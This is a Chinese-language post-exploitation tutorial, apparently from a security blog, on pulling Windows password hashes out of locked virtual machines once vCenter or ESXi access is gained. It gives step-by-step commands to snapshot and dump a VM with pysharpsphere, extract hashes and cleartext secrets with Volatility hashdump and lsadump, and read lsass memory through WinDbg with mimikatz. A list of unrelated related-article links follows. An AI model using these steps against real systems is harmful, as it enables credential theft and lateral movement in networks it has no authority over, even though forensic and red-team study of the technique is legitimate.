VCenter获得锁屏机器Hash之内存快照抓取Hash
VCenter获得锁屏机器Hash之内存快照抓取Hash
内存快照抓hash
在很多情况下,当我们拿到VCenter或ESXI 服务器权限和Web后台权限登录后,发现很多重要的系统锁屏了,想要进入还需要输入密 码。因此,这时我们就需要抓取处于锁屏状态机器的Hash了。以下介绍使用内存快照抓取Hash。
使用pysharpsphere或SharpSphere对指定目标机器拍摄快照,然后dump镜像到本地。
#dump MoID为vm-59的机器镜像到本地
pysharpsphere -H 192.168.106.14 -u administrator@vsphere.local -p "P@ssword1234" dump -t vm-59
Volatility读取内存
目标机器快照镜像dump到本地后,可以使用Volatility直接对.vmem文件进行内存密码抓取。
如下命令获取镜像信息:
./volatility_2.6_mac64_standalone -f Win7-Snapshot2.vmem imageinfo
如下命令抓取哈希或明文密码:
#抓取哈希
./volatility_2.6_mac64_standalone -f Win7-Snapshot2.vmem --profile=Win7SP1x64 hashdump
#抓取明文密码
./volatility_2.6_mac64_standalone -f Win7-Snapshot2.vmem --profile=Win7SP1x64 lsadump
windbg读取内存
也可以使用windbg进行读取。首先使用 Bin2Dmp执行如下命令将该内存文件转成dmp文件,如下转成win7.dmp文件。
Bin2Dmp.exe Win7-Snapshot2.vmem win7.dmp
然后使用windbg载入win7.dmp文件,如下。
接着在kd> 中输入下面的命令
#设置符号路径
.symfix
#重新载入
.reload
#加载mimilib.dll路径
.load D:\mimikatz\x64\mimilib.dll
#查找lsass进程,并将该进程转到本机环境中
!process 0 0 lsass.exe
#这里的fffffa80035c4b30是上一步查找lsass进程的地址,注意替换
.process /r /p fffffa80035c4b30
#载入mimikatz,读取密码
!mimikatz
最后读取出密码如下。
相关:ESXI环境搭建和配置
相关文章
- 内存数据库中的自动优化是为了解决什么问题?
- LeCun转赞:在苹果M1/M2芯片上跑LLaMA!130亿参数模型仅需4GB内存
- 【Android 逆向】代码调试器开发 ( ptrace 函数 | 向进程内存写出数据 )
- 浅谈redis内存数据的持久化方式
- 管理Linux内核:强大的内存管理系统(linux内核内存)
- 检测Linux机器内存状态检测(linux机器内存)
- 如何优化MySQL占用内存(mysql占用内存过大)
- 优化Linux机器内存优化:从零到千(linux机器内存)
- 极简单Linux:仅需1G内存即可体验(1g内存装linux)
- 查看Linux内存使用情况(查看内存linux)
- Linux页表项:快速老化的内存管理解决方案(linux页表项)
- Linux 命令行:查看内存使用情况(linux下查看内存)
- 比较存入Redis与存入内存的抉择(存redis和存内存)
- 数据太大爆内存怎么办?七条解决思路 | 机器学习开发手册